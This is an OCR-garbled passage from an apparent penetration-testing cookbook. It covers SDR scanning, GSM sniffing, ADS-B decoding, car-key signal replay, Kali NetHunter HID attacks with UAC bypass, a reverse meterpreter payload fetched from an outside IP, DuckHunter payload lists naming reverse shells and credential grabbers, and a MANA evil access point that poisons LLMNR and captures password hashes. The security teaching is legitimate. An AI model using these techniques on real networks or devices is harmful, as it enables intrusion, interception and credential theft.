2. We should see a new window open, showing the GUI interface of the tool; here we can simply enter 
the frequency range on which we want to perform the scan and click on Start scan: 














i) Wax zee wne se 


@€¢°o #Q= B86 Q 








Range (MHz) Gain (dB) Mode Dwell FFT size 
Sit uals | Start | 90 |*) Stop 108|$}|0.0 ¥| | Continuous ¥ 1024 ¥ 
Status: Info: @ GPS: Disabled 


3. It will take some time to see a sweep of frequencies, and then we will see the result in graphical 
format: 





RTLSDR Scanner - Scan 87.0-108.0MHz* eo 90 
File Edit View Scan Tools Help 










































Frequency Spectrogram 
87 - 108 MHz, gain = 0.0dB 
r - ; T-1017875000° MH: 
seassapaanaistnssarsesangacsanniantacamsscnstsaicaen anno MGs BYE hse —46.50 
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—48.00 
—48.25 
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Frequency (MHz) 
i (JP Min (J Mean (1) -3dB Start | OBW Start 
\F End () P Max | GMean -3dB End OBW End 
F Delta P Delta Flatness -3dB Delta OBW Delta 
OO fe) = @ we [ew 3 (A) * A” 3 Min max var AQ ft A (Bie v 
E Range (MHz) Gain (dB): Mode Dwell FFT size Display 
_ (Star [>| |Stop I} Start | 87|*) Stop | 108|7)|0.0 v| :|Single  v|/131ms v||1024 ¥| Plot y 
Status: Finished Info: @ GPS: Disabled 


If the application stops responding, it is recommended you lower the range and choose 
Single as the Mode instead of continuous. 


Playing around with gqrx 


The gqrx tool is an open source software-defined radio (SDR) receiver powered by the GNU radio and 
the Qt graphical toolkit. 


Tt has many features such as: 


Discovering devices connected to a computer 

Processing I/Q data 

AM, SSB, CW, FM-N, and FM-W (mono and stereo) demodulators 
Recording and playing back audio to/from WAV file 

Recording and playing back raw baseband data 

Streaming audio output over UDP 


In this recipe, we will cover basics of gqrx and another tool, RTLSDR. 


How to do it... 


Following is the recipe to use gqrx: 


1. We can install gqrx using the command: 


apt install gqrx 


2. Once it's done, we run the tool by typing garx. 
3. We choose our device from the drop-down menu in the window that opens and click OK: 


Configure I/O devices 
1/Q input 
Device | Realtek RTL2838UHIDII ~ 
Device string rtl=0 
Input rate 1800000 


Decimation None 
Sample rate 1.800 Msps 
Bandwidth | 0.000000 MHz 


LNB LO | 0.000000 MHz 


Audio output 
Device Built-in Audio Analog Ste ~ 


Sample rate 48 kHz 


Cancel | 





4. Now the GQRX application opens, and on the right-side in the receiver window, we choose the 


frequency we want to view. Then we go to the file and click on Start DSP: 


igi} Tools View Help 


Start DSP Ctrl+D ry 
@ 1/0 Devices 
&® Load settings Ctrl+L 
fel Save settings Ctrl+S 
Save waterfall Ctrl+W 
Quit Ctrl+Q 
Bt) 





5. Now we see a waterfall and we should start hearing the sound in our speaker. We can even change 


the frequency we are listening to using the up and down buttons in the Receiver Options window: 


Receiver Options (fe) 


se) fA 10) 5 2) (0) (0) iar: 


Hardware freq: 935.000000 MHz 
Frequency 934629.100 |> kHz 
Filter width | Normal 
Filter shape | Normal Y 

Mode AM . 
AGC | Medium = 
Squelch | -150.0 dB > A R 
Noise blanker NB1 NB2 


Input controls Receiver Options _ FFT Settings 


Audio ax 


-20 





6. We will look at an example of a car key remote, which is used to lock/unlock a car. 
7. Once we press the button a couple of times, we will see the change in the waterfall showing the 
difference in the signal: 


443.001.000 


nl l Baal i attr A Mid e) Uctnhnary' tyMatenh al In le Leh enbhewigle Mak HiNtar, 





8. We canrecord the signal in the record window and then save it. This can be later decoded and 
transmitted back to the car using a transponder to unlock it. 


9. To capture the data at 443 MHz, we can use the command: 


| rtl_sdr -f 443M - | xxd 


The following screenshot shows the output of the preceding command: 


:~# rtl_sdr -f 93.5M - | xxd 
Found 1 device(s): 
@: Realtek, RIL2Z838UHIDIR, SN: 00000001 


Using device @: Generic RTL2832U OEM 
Found Rafael Micro R820T tuner 
[R82XX] PLL not locked! 
Sampling at 2048000 S/s. 
Tuned to 93500000 Hz. 
Tuner gain set to automatic. 
samples in async mode... 
QGc2 alae 40ff 30ff bab1l 15bb 
a b593 ff90 ff19 ffb2 30de ffa2 ebcb 
ff8b 2660 c97e 4aa3 0000 O5fF 
o 7fff 29c0 6400 64ff 7c79 3ee7 
8da9 6163 37aa 96FfFf : 


. #0 


3700 5523 70f7 6 FE) .U#p...m.P. 
62a3 2bbf sU2ZbreGia he .9..b.+.t.0&.. 


5 9395 829b 5e7e adff 182c 
a4ff ffdc 205b 41c7 
2964 adff 0039 O0c53 
2fd4 30b0 9 8bff 3332 
4b87 4f49 « Clefelemmclol=v7 
4d6d 9099 34 108e aad7 
Offf 2872 cfle cb31 
5e31 7b47 d6ff 5abl 
d25d 8f92 a0c4 6299 
b164 ff5e 06 4e63 40af 





There's more... 


To learn more about gqrx, visit these blogs: 


@ =http://gqrx.dk/doc/practical-tricks-and-tips 
® https://blog.compass-security.com/2016/09/software-defied-radio-sdr-and-decoding-on-off-keying-ook/ 


Kalibrating device for GSM tapping 


RTLSDR also allows us to view GSM traffic using a tool called kai or kalibrate-rt1. This tool can scan for 
GSM base stations in a frequency band. In this recipe, we will learn about using kalibrate and then 
confirm the channel in gqrx. 


How to do it... 


Following are the steps to use kalibrate: 


1. Most of the countries use the GSM900 band. In the USA, it's 850. We will use the following 
command to scan for GSM base stations: 


| kal -s GSM900 -g 40 


The following screenshot shows the output of the preceding command: 


; nfig# kal -s GSM900 -g 40 
Found 1 device(s): 
@: Generic RTL2832U OEM 


Using device 0: Generic RTL2832U OEM 
Detached kernel driver 

Found Rafael Micro R820T tuner 

Exact sample rate is: 270833.002142 Hz 
[R82XX] PLL not Locked! 

Setting gain: 40.0 dB 


GSM-900: 


(ol at- |e 4 -4MHZ - .209kHZ) power: 9917 
chan: 941.8MHz - .O99kHzZ) power: 
chan: | Pa .653kHZ) power: 
chan: 53 (945.6MHz - .620kHZ) power: 
chan: 57 -4MHz - .736kHz) power: 
chan: 947.2MHzZ - .201kHZ) power: 
chan: 947 .6MHzZ - .177kHZ) power: 





3. We note the frequency; in our case, we will use 947.6 mz along with the offset. 


4. Now we open GQRX and enter it in the Receiver Options window: 


File Tools View Help 
esa! 


949.590.8823 


Hardware freq: 


Rae 
—— Rabpnaies ripe 


Why eat 


Receiver Options 


-20 


Pray 


AY 
if 


hen is se REY Frequency 
-60 


-80 


Filter width | Wide 
Filter shape Normal 


Mode WFM (mono) 





AGC | Medium 
Squelch | -150.0 dB * A 


Noise blanker NB1 NB2 


Input controls 


Receiver Options 


Audio 





5. We can see in the waterfall that the device is able to catch signals perfectly. 


eax 


oe re ee et 


947.605000 MHz 


947590.823 || kHz 


v 
¥ 
v 


¥ 


FFT Settings 


@ &) 





-42.1 dB 


6. Now we will look at this data at the packet level. We will use a tool known as gr-gsm. 


7. It can be installed using apt install gr-gsm: 


root@kali:~# 

root@kali:~# apt install gr-gsm 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

gr-gsm is already the newest version (0.41.2-1). 


The following packages were automatically installed and are no longer required: 


apg apt-transport-https aptitude-doc-en augeas-lLenses cheese-common commix 
couchdb cups-pk-helper dkms empathy-common erlang-asnl erlang-base 
erlang-crypto erlang-eunit erlang-inets erlang-mnesia erlang-os-mon 
erlang-public-key erlang-runtime-tools erlang-snmp erlang-ssl 
erlang-syntax-tools erlang-tools erlang-xmerl espeak-data exe2hexbat 
firebird2.5-common firebird2.5-common-doc folks-common gd 


girl.2-clutter-gst-2.0 girl.2-javascriptcoregtk-3.0 girl.2-totem-1.0 


girl .2-totem-plparser-1.0 girl.2-webkit-3.0 gnome-control-center-data 
gstreamerl.@-clutter gstreamerl.O-nice gstreamerl .0-plugins-ugly 
guile-2.0-libs ipxe-qemu king-phisher lLibasn1-8-heimdal LibaugeasO 
Libbind9-90 Libbladerf®0 Libboost-filesysteml .55.0 
Libboost -program-options1.55.0 Libboost-pythonl.55.0 Libboost-regex1. 
Libboost -serializationl .55.0 Libboost-system1.55.0 Libboost-test1.55.0 
-thread1.55.0 Libcacard® Libchamplain-0.12-0 Libchamplain-gtk-®0. 
-accessor-perl Libclutter-gst-2.0-0 Libcolord-gtkl Libcrypto++6 
Libcrypto++9 Libdbus-1-dev Libdee-1 4 Libdns100 Libebackend-1.2-7 
lLibedata-cal-1.2-23 Libegl1l-mesa-dr Ss Llibelfg@ Libept1.4.12 Libespeak1l 
libexiv2-13 Libfdtl Libfluidsynthl Libfolks-eds25 Libfolks-telepathy25 
Libfolks25 Libfuzzy2 Libgdict-1.0-6 Libglewl.10 Libgphoto2-port10 


Ve 





8. Once it is done, if we type grgsm_ and press the Tab key, we will see a list of different tools available 


for us: 


root@kali: ~ 


File Edit View Search Terminal Help 
i~# grgsm_ 

grgsm_capture grgsm_decode grgsm_livemon_headless 

grgsm_channelize grgsm_lLivemon grgsm s 


:~# grgsm_ 





9. First, we will use grgsm_1ivemon to monitor the GSM packets live. We'll open the terminal and type 


grgsm_livemon: 


Gr-gsm Livemon 


PPM Offset 0.000 


Gain 30.000 


ren, ———— 


Relative Gain (dB) 
: a 

o 

it 





941800000 |* 


__. ~ Data 0 





——— r — 
941.500 942.000 
Frequency (MHz) 


T T 


it pat 
941.000 942.500 














10. Inthe new window that opens, we will switch to the frequency we captured in the previous steps 


using kalibrate: 





Gr-gsm Livemon 


PPM Offset 0.000 
Gain 30.000 
Frequency ; OD ops esirs 

-20 


-40 


-60 


Relative Gain (dB) 


-80 


pein fee the ee ee 





947600000 |* 


if rial nat 








Le VE ff fa 
946.600 946.700 946.800 946.900 947.000 947.100 


11. We can zoom into a particular range by dragging and selecting the area on the graphical window. 


testi 
947.200 


— Data 0 


12. Inthe new terminal window, we start Wireshark by typing wireshark. 


13. We then set the adapter to Loopback: lo and start our packet capture: 




















The World's Most Popular 


= 
WIRESHARK Version 1.12.6 (Git Rev Unknown f 





| 


_ Interface List 


{ 
~) Live list of the capture interfaces 


(counts incoming packets) 


Start 


Choose one or more interfaces to capture from, then Start 


‘@letho 


\flany 


Lm | Roveys}oy-1a eal 
Pinflog 
@intqueue 





o) Capture Options 


Start a capture with detailed options 


14. Next, we add the filter gsmtap: 











Filter: _ gsmtap ~ | Expression... Clear Apply Save 
No. Time Source Destination Protocol Length Info 
Ver ere rare er ere ae —— tr Tey errr ern errenerryernn gy — were 
410 6.559696000 127.0.0.1 127.0.0.1 GSMT.AP 81 (CCCH) (RR) Paging Request Type 1 
411 6.561027000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 
2 6.563428000 127.0.0.1 127 1 i Paging 
413 6.563608000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 
414 6.565694000 127.0.0.1 127.0.0.1 GSMTAP 81 (CCCH) (RR) Paging Request Type 1 
415 6.565874000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 
416 6.626651000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (ss) 
417 6.629165000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
418 6.631228000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 
419 6.632487000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
420 6.633865000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 
421 6.688695000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
422 6.688854000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown 
423 6.692349000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
424 6.692515000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown 
425 6.695730000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown 
426 6.696818000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
427 6.697682000 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown 
428 6.754927000 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
429 6.760595000 127.0.0.1 127.0.0.1 


LAPDm 81 U, func=Unknown(DTAP) (SS) 


meee emesis owe anew en ae Pana Fan -” 


15. We should see the packets in the info window. We should see a packet with label System Information 
Type 3; let's open it: 


2121 36.36861500 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
2122 36.37137300 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown 

2123 36.37233700 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 
2124 36.37443700 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 

2126 36. 43948700 127.0.0.1 127.0.0.1 LAPDm 81 U, func=Unknown(DTAP) (SS) 

2127 36.44445200 127.0.0.1 127.0.0.1 GSMT AP 81 (CCCH) (RR) Paging Request Type 1 


16. We will see the system information such as Mobile Country Code, Network Code, and Location 
Area Code: 


~ GSM CCCH - System Information Type 3 


> 
> 


7™~yrywrry 


17. Now with this recipe, 


L2 Pseudo Length 

Protocol Discriminator: Radio Resources Management messages 

Message Type: System Information Type 3 

Cell Identity - CI (51661) 

Location Area Identification (LAI) 

~ Location Area Identification (LAI) - 404/10/617 
Mobile Country Code (MCC): India (Republic of) (404) 
Mobile Network Code (MNC): Bharti Airtel Ltd., Delhi (10) 
Location Area Code (LAC): 0x0269 (617) 

Control Channel Description 

Cell Options (BCCH) 

Cell Selection Parameters 

RACH Control Parameters 

SI 3 Rest Octets 


we have learned how GSM packets travel. 


There's more... 


Here are some great videos to give you a better understanding of GSM sniffing: 


© = https://www.crazydanishhacker.com/category/gsm-sniffing-hacking/ 


Decoding ADS-B messages with Dump1090 


ADS-B stands for Automatic Dependent Surveillance-Broadcast. It is a system in which electronic 
equipment onboard an aircraft automatically broadcasts the precise location of the aircraft via a digital 
data link. 


As described in the official readme of the tool, Dump1090 is a Mode S decoder specifically designed for 
RTLSDR devices. 


The main features are: 


Robust decoding of weak messages. With mode1090, many users observed improved range 
compared to other popular decoders. 

Network support—TCP30003 stream (MSGS), raw packets, HTTP. 

Embedded HTTP server that displays the currently detected aircrafts on Google Maps. 

Single-bit error correction using 24-bit CRC. 

Ability to decode DF11 and DF17 messages. 

Ability to decode DF formats such as DFO, DF4, DF5, DF16, DF20, and DF21, where the checksum 
is XOR-ed with the ICAO address by brute-forcing the checksum field using ICAO addresses, which 
we've covered. 

Decode raw IQ samples from file (using the --ifi1te command-line switch). 

Interactive CLI mode where aircrafts currently detected are shown as a list, refreshing as more data 
arrives. 

CPR coordinate decoding and track calculation from velocity. 

TCP server streaming and receiving raw data to/from connected clients (using --net). 


In this recipe, we will use the tool to look at air traffic with visuals. 


How to do it... 


Following are the steps to use Dump1090: 


1. We can download the tool from the Git repo using the command git clone 


https://github.com/antirez/dump1090. git: 


:~# git clone https://github.com/antirez/dump1090.git 


Cloning into 'dump1090'... 
remote: Counting objects: 265, done. 

remote: Total 265 (delta @), reused 0 (delta 0), pack-reused 265 
Receiving objects: (265/265), 536.32 KiB | 266.00 KiB/s, done. 


Resolving deltas: 100% (147/147), done. 
i-# 





2. Once downloaded, we go the folder and run make. 
3. We should now have an executable. We can run the tool using the following command: 


| ./dump1090 --interactive -net 
The following screenshot shows the output of the preceding command: 


File Edit View Search Terminal Help 


meme lale Altitude Speed 
28.447 77.071 103 





4. Ina few minutes, we should see the flights, and by opening the browser to nttp://localhost :8080, We 
will be able to see the flights on the map as well. 


There's more... 


More about this can be learned from https://www.rtl-sdr.com/adsb-aircraft-radar-with-rtl-sdr/. 


Kali in Your Pocket — NetHunters and 
Raspberries 


In this chapter, we will cover the following recipes: 


Installing Kali on Raspberry Pi 
Installing NetHunter 

Superman typing — HID attacks 
Can I charge my phone? 

Setting up an evil access point 


Introduction 


In some cases, while doing pentest, a client may ask us to do a proper red team attack. In such cases, 
walking into an office with a laptop in hand may look suspicious, which is why this chapter comes in 
handy. We can perform a red teaming using a small device such as a cell phone or Raspberry Pi and carry 
out pentest effectively using them. In this chapter, we will talk about setting up Kali Linux on Raspberry 
Pi and compatible cell phones and using it to perform some cool attacks on the network. 


Installing Kali on Raspberry Pi 


Raspberry Pi is an affordable ARM computer. It is extremely small in size which makes it portable, and 
because of which it's best suited for Kali Linux-like systems to perform pentesting with portable devices. 


In this recipe, you will learn about installing a Kali Linux image on a Raspberry Pi. 


Getting ready 


Raspberry Pi supports SD cards. The best way to set up Kali on Raspberry Pi is to create a bootable SD 
card and insert it into Pi. 


How to do it... 


To install Kali on Raspberry Pi follow the given steps: 


1. We will first download the image from Offensive Security's website at https://www.offensive-security.com/kali 


-linux-arm-images/: 
RaspberryPi Foundation Vv 


Image 
Size Version SHA256Sum 
Name 


RaspberryPi 
273 0.8G | 2017.1 4976C446802EE16252954453DC577E2001698492E52DDE47B27B8548C01 BA686 


RaspberryPi 0.8G 2017.1 08B71BCC38615422B57C62AD003FC37E67278A9172C79B7AE7C8B7DCEC684E98 


RaspberryPi 
iat 0.8G 2017.1 8E121F87AE65491C3077172DB65FE2CDB7379BA47281 0BB338461A947A99AD46 
wi 





2. Once the image is downloaded, we can use different ways to write this image into our memory card. 
3. On Linux/macOS, it can be done using the aa utility. The aa utility can be used using the following 
command: 


| dd if=/path/to/kali-2.1.2-rpi.img of=/dev/sdcard/path bs=512k 


4. Once this process completes, we can plug the SD card into the Pi and power it on. 
5. We will see our Kali boot up: 





We can refer to this link for a more detailed guide: https://docs.kali.org/downloading/kali-linux-live- 


usb-install. 


Installing NetHunter 


As described by Offensive Security's official wiki: 


"The Kali NetHunter is an Android ROM overlay that includes a robust Mobile Penetration Testing 
Platform. The overlay includes a custom kernel, a Kali Linux chroot, and an accompanying Android 
application, which allows for easier interaction with various security tools and attacks. Beyond the 
penetration testing tools arsenal within Kali Linux, NetHunter also supports several additional 
classes, such as HID Keyboard Attacks, BadUSB attacks, Evil AP MANA attacks, and much more. 
For more information about the moving parts that make up NetHunter, check out our NetHunter 
Components page. NetHunter is an open source project developed by Offensive Security and the 
community." 


In this recipe, you will learn how to install and configure NetHunter on an Android device and perform 
attacks using it. We can find a list of supported hardware at https://github.com/offensive-security/kali-NetHunter/wiki. 


Getting ready 


Before we start, we need the device to be rooted with Team Win Recovery Project installed as a custom 
recovery. 


How to do it... 


To install NetHunter follow the given steps: 


1. We download the NetHunter ZIP file and copy it to the SD card, and then we reboot the phone into 
the recovery mode. We are using OnePlus One with Cyanogenmod 12.1. Recovery mode can be 
booted by pressing the power and volume down button simultaneously. 

2. Once it is in the recovery mode, we choose to install on the screen and select the ZIP file. We can 
download the ZIP from https://www.offensive-security.com/kali-linux-NetHunter-download: 





https://www.offensive-security.com/kali-linux-nethunter-download/ Ww ‘Be ; 
“»* Hack The Planet - I... 97K Men's Stand U.... [] abxx [fF & HackForums (@Kaotic Creations #5 techorganic [@gOtmiik: ™ Tenable Nessus Vul... Diagn 
leer aIemww9s9,: © 
j | | S Vt 3 
. F F EN = iV E Courses Certifications Online Labs Penetration Testing Projects Blog / 
> Gs.es. LQ! 
Home > Kali Linux NetHunter Downloads 
Current NetHunter Release - v3.0 | NetHunter Documentation 
Nexus 4 & 5 Android Phone Nexus 7 Mini Tablet Nexus 10 Tablet 


3. When it's done, we reboot the phone and we should see NetHunter in our application menu. 


4. But before we start, we need to install BusyBox on the phone from Play Store: 


BuUSYB#x 





BusyBox 
Stephen (Stericson) 








INSTALL 


aoe 


Downloads 149,505 2 Tools Similar 





The fastest, most trusted, and #1 
BusyBox installer and uninstaller! 


READ MORE 


About BusyBox Applet Manager | 





5. Once this is done, we run the app and click on Install: 


[aa] 


@ eusyeox 


Applet Manager 


@ 48 6:10 
Auto Update Busybox 


Install Busybox About Busybox 


BusyBox v1.27.1-Stericson is installed. 


BusyBox is installed to /system/xbin/ 


Busybox 1.27.1 
will be installed to 


ESisieclaa)bAelia 


Free space in /system/xbin 472.0mb 


v 


Smart Install 


Please be aware that smart install can only 
install an applet if it is provided by the binary 


being installed. 


To access the advanced features of Smart 
Install, touch the arrow above. 





Uninstall 


6. Next, we open NetHunter, and from the menu, we choose Kali Chroot Manager: 


0 4G 2:52 


Version: 3.15 (test-keys) 


Built by Kali at 2016-09-04 08:38:31 PM GMT+05:30 


ft 





Home 


Kali Chroot Manager 


Check App Update 


Kali Services 


Custom Commands 


MAC Changer 


VNC Manager 


7. We click on ADD METAPACKAGES and we will be all set for the next recipe: 


we Oey 


Kali Chroot Manager 


The Kali chroot 


The "chroot" is a full installation of Kali Linux that 
shares processing, networking, storage, and other 
resources with Android. It resides in your internal 
app storage area and requires about 400MB for the 
minimal core installation. 


ADD METAPACKAGES REMOVE CHROOT 


Status: 





Superman typing — HID attacks 


NetHunter has a feature that allows us to turn our device and OTG cable to behave as a keyboard and 
hence type any given commands on any connected PC. This allows us to perform HID attacks. 


"HID (human interface device) attack vector is a remarkable combination of customized hardware and 
restriction bypass via keyboard emulation. So, when we insert the device, it will be detected as a 
keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast 
set of keystrokes to the target's machine and completely compromise it." 

— https://www.safaribooksonline.com/library/view/metasploit/9781593272883/ 


How to do it... 


To perform HID attacks follow the given steps: 


1. We can perform them by opening the NetHunter app. 
2. Inthe menu, we choose HID attacks: 


VAG 2:52 


Version: 3.15 (test-keys) 
Built by Kali at 2016-09-04 08:38:31 PM GMT+05:30 


Home 
Kali Chroot Manager 


Check App Update 


Kali Services 
Custom Commands 
MAC Changer 


VNC Manager 


tO s ® 


— i || DN r= (0l <3) 


PowerSploit 


The Powersploit payload provides you a choice of 
reverse meterpreter HTTP/S payloads. URL to 
payload should be a URL accessible to the victim 
machine where the larger payload is downloaded 
to. 


IP Address (LHOST) 
192.168.1.17 
Port (LPORT) 
4444 


ercWaleke\e} 
windows/meterpreter/reverse_https 
URL to payload 


https://138.68.17.41:8443/ 


UPDATE 





4. Let's try the Windows CMD; in the Edit source box, we can type the command we want to be 


executed. We can even choose UAC Bypass from the options to make the command run as admin on 
different versions of Windows: 


a fos ® 9 4 G 2:57 


= HID Attacks : 


Windows CMD 


This Windows CMD payload allows you to enter 
raw commands to a Windows command prompt. 
Hitting the list menu will allow you to choose 
keyboard layout or UAC bypass options. 


Edit source 


echo "hello world” 





5. We choose Windows 10 from the UAC Bypass menu and then we type a simple command: 


echo "hello world" 


UAC Bypass: 


O No UAC Bypass 


OM incloncw, 
O Windows 8 


@© Windows 10 





6. Then, we connect our phone to a Windows 10 device and select Execute Attack from the menu: 


Bots 948 4:01 


= HID Attack: UAC Bypass 


Keyboard Layout 


This Windows CMD | 
raw commands toa\ Execute Attack 

Hitting the list men 

keyboard layout : 


; Reset USB 
Edit source 


echo "hello world” 


LOAD FROM SDCARD SAVE TO SDCARD U 


P 





7. We will see the command being executed: 





Gl C:\WINDOWS\system32\cmd.exe 


"hello world” 





For more information, visit https://github.com/offensive-security/kali-NetHunter/wiki/NetHunter-HID-Attack 


S. 


Can I charge my phone? 


In this recipe, we will look at a different type of HID attack, known as DuckHunter HID. This allows us 
to convert infamous USB Rubber Ducky scripts into NetHunter HID attacks. 


How to do it... 


To perform DuckHunter HID attacks follow the given steps: 


1. We can perform them by opening the NetHunter app. 
2. Inthe menu, we choose DuckHunter HID attacks. 
3. The Convert tab is where we can type or load our scripts for execution: 


Bats 


=  DuckHunter HID 


Convert 


The DuckHunter script can easily convert USB 
Rubber Ducky scripts into NetHunter HID format. 
You can generate preconfigured scripts at the 
incredibly useful Ducky Toolkit site, or check out the 
Rubber Ducky script syntax from the official 


Example presets 
Select preset 
Preview 


REM This is a comment 
STRING Hello world! 
STRING Example of typing to computer. 
Nethunter is awesome! 
REM To sleep for five seconds use 
nal itsx=xexe) are ks 
SLEEP 5000 
STRING | slept for 5 seconds, now I'm 
awake! 
STRING abcdefghijklmnopqrstuvwxyz 
STRING 
ABCDEFGHIJKLMNOPQRSTUVWXYZ 
STRING 1234567890-=!@#$%*&*()_+ 
STRING []\;,./GI:"<>?°~ 
MOUSE 300 300 

\ L 





4. Let's start by using a simple Hello world! script. 
5. We open a text editor on any device and then we connect our device and click on the play button. 


6. We will see that this is automatically typed in the editor: 


Hello world! 

Example of typing to computer. Nethunter is awesome! 
I slept for 5 seconds, now I'm awake! 

abcdefghij klmnopqrstuvwxyz 
ABCDEFGHIJKLMNOPQRSTUVWXYZ 

1234567890-=! G#$%*Ex()_+ 

(] 


7. There are multiple scripts available on the internet that can be used to perform multiple attacks using 
NetHunter: 


Payload — Hello World 

Payload — WiFi password grabber 

Payload — Basic Terminal Commands Ubuntu 
Payload — Information Gathering Ubuntu 
Payload — Hide CMD Window 

Payload — Netcat-FTP-download-and-reverse-shell 
Payload — Wallpaper Prank 

Payload - YOU GOT QUACKED! 

Payload — Reverse Shell 

Payload — Fork Bombo 

Payload — Utilman Exploit 

Payload — WiFi Backdoor 

Payload — Non-Malicious Auto Defacer 
Payload — Lock Your Computer Message 
Payload — Ducky Downloader 

Payload — Ducky Phisher 

Payload — FTP Download / Upload 

Payload — Restart Prank 

Payload — Silly Mouse, Windows is for Kids 


Payload — Windows Screen rotation hack 





Payload — Powershell Wget + Execute 


8. These can be downloaded and loaded into NetHunter and then later used to exploit a victim's PC; the 
list can be found at https://github.com/hak5Sdarren/USB-Rubber-Ducky/wiki/Payloads. 


More information can be found at https://github.com/hakSdarren/USB-Rubber-Ducky/wiki. 





Setting up an evil access point 


The MANA toolkit is an evil access point implementation kit created by SensePost, which can be used to 
perform Wi-Fi, AP, and MITM attacks. Once a victim connects to our access point, we will be able to 
perform multiple actions, which you will learn about in this recipe. 


How to do it... 


To set up an evil access point follow the given steps: 


1. It's easy to use. In the NetHunter menu, we choose Mana Wireless Toolkit: 


9 444 5:29 


MITM Framework 


MAL Changer 

VNC Manager 

HID Attacks 
DuckHunter HID 

Bad USB MITM Attack 
Mana Wireless Toolkit 
MITM Framework 
Nmap Scan 
Metasploit Payload Generator 
SearchSploit 
Pineapple Connector 


Wardriving 





2. It opens up in the General Settings tab. Here, we can choose the interface and other options, such as 
capturing cookies. This can be used to perform a wireless attack by performing an evil twin attack 
using an external wireless card supported by NetHunter: 


DS#a 


= MITM Framework 


General Settings ietctsy eleyare(<) 


Interface 
Ni Ectale) 
General Settings 


[_] JavaScript Keylogger 

a Enable Ferret-NG Cookie Capture Plugin 
| Browser Profiler 

{_] FilePWN (BDFPROXY) 

(_] BeEEF Autorun 

oO SMB challenge-response auth attempts 
CJ sststrip+ 

oO 7 Noy ol @r-el nt re) 0) 

[_] Enable Upsidedowninternet 


ScreenShotter 


O Enable ScreenShotter Plugin 


Interval (in seconds) to screenshot: 





3. You learned about responder in the previous chapters. We can use responder via this toolkit to 


capture network hashes. 
4. First, we connect to the network we want to perform the attack on. 


5. Next, we switch to the Responder Settings tab and check on the attacks we wish to perform. We 
choose wlan0 as our interface: 


a Dy & ~ 4 7 5:30 


= MITM Framework 


Settings Responder Settings Inject Se 


Responder allows you to poison LLMNR, NBT-NS 
and MDNS requests 


Responder Settings 
Enable Responder Plugin 
Enable Analyze 
Fingerprint Host 
Lixo) cex-W WY, Mat=tsa Ke (o\nate] -Lo(-} 

4 Enable NBTNS 


| WPAD Rogue Proxy Server 


(LJ Enable Wredir 





6. To change the interface we want to listen to, we switch to the General Settings tab and choose from 
the list of interfaces from the drop-down list: 


pHa & 9 412 5:19 


—— ee Yes laa te\ ce) a 4 


General Settings 


Interface 
wlanO 
General Settings 


0 JavaScript Keylogger 
oO Enable Ferret-NG Cookie Capture Plugin 
oO Browser Profiler 


[_] FilePWN (BDFPROXY) 


(_] BeEEF Autorun 


| SMB challenge-response auth attempts 

MRSS: 

oO 7 No) Or-(eln-M exe) sxe)4) 

Oo Enable Upsidedowninternet 
ScreenShotter 


Oo Enable ScreenShotter Plugin 


Interval (in seconds) to screenshot: 





7. Now we click on the Start mitm attack from the options menu on the right-hand side. 


8. We will see a Terminal window open and our attack will be performed. We will see the host info as 
well as password hashes captured by the attack: 


oe 


1) No titley 


NEN NN NN Ne URN. AM NSN NZ 


NN Nae Ne iog CN NEN 


[*] MITMf v0.9.7 online... initializing plugins 
|_ Responder v0.2 
| |_ NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffij 
le online 
|_ You can ICMP Redirect on this network. This 
in (192.168.110.19) is not on the same subnet than 
rver (208,.67.220.220) 
| |_ You can ICMP Redirect on this network. This 
In (192.168.110.19) is not on the same subnet than 
rver (208.67.222.222) 
| | Responder is in analyze mode. No NBT-NS, LLMNR, MDNS fr 
lequests will be poisoned 


| 

|_ Sergio-Proxy v0.2.1 online 

|_ SSLstrip v0.9 by Moxie Marlinspike online 
|_ Net-Creds v1.0 online 

|_ DNSChef v0.4 online 

|_ SMBserver online (Impacket 9.13) 


2017-09-19 12:53:13 [SMBserver] Config file parsed 

2017-09 12 3 [SMBserver] Callback added for UUID 4B32| 
4FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 

2017-09-19 12:53:13 [SMBserver] Config file parsed 
2017-09-19 12:53:28 [LLMNRPoisoner] 192.168.110.26 is lookin 
lg for: printer 

2017-09-19 12:53:28 [LLMNRPoisoner] 192.168.110.26 is lookin] 
lg for: printer 

2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is lookin 
ig fo PRINTER | Service requested: File Server Service | OS 
: Windows 10 Home 15063 | Client Version: Windows 10 Home 6. 
3 
2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is lookin 
ig for: PRINTER | Service requested is: File Server Service 
2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is lookin] 
ig for: PRINTER | Service requested is: File Server Service 





9. Similarly, there are other attacks, such as Nmap scans, generating Metasploit payloads, and so on. 


For more information, visit https://github.com/offensive-security/kali-NetHunter/wiki. 


